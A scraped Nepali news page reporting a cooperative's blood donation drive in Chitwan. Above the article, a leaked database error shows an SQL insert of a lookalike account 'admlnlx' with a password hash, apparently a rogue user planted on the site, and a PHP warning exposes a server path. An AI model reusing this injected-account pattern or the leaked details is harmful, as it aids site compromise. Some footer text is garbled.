WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BparMbP7cn1t5qQRCmmynmIkZ5k0fJ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 05:33:28', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
हिमाली बचतको आयोजनामा रक्तदान – Gaule Khabar

हिमाली बचतको आयोजनामा रक्तदान

हिमाली बचतको आयोजनामा रक्तदान

चितवन, माघ २२–
हिमाली बचत तथा ऋण तथा सहकारी संस्था लिमिटेड भरतपुर–११ जागृतीचोकको आयोजनामा खुल्ला रक्तदान कार्यक्रम सम्पन्न भएको छ ।

हिमालय निमावि जागृति चोकको प्राङ्गढमा भएको कार्यक्रममा ३५ जनाले रक्तदान गरेका छन् । जिल्ला बचत संघकी सचिव विद्या कोईरालाको प्रमुख आतिथ्यता रहेको कार्यक्रममा रक्तसंचार केन्द्रका दिपक न्यौपाने विशिष्ट अतिथी रहनुभएको थियो । कार्यक्रम हिमाली बचत तथा ऋण तथा सहकारी संस्था लिमिटेडका अध्यक्ष बालकुमारी कंडेल अर्यालको सभापतित्वमा सम्पन्न भएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका